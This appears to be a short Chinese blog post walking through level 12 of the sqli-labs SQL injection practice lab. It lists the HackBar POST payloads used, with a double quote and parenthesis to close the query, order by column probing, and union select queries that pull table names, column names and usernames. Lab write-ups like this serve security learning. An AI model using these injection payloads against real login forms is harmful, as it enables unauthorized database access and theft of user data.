本文主要是介绍Sqlilabs-12,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
这里到了 12 关,是 11 关的练习版本,只不过是把单引号换成了 双引号 + 括号,其余的都是一样的。
这里仍然以 hackbar 为例构造 payload:
uname=admin") order by 3#&passwd=1&submit=submit
uname=admin") order by 2#&passwd=1&submit=submit
uname=-admin") union select 1,2#&passwd=1&submit=submit
uname=-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=submit
uname=-admin") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users'#&passwd=1&submit=submit
uname=-admin") union select 1,group_concat(username) from users#&passwd=1&submit=submit
uname=-admin") union select 1,group_concat(username) from users#&passwd=1&submit=submit
😄
这篇关于Sqlilabs-12的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
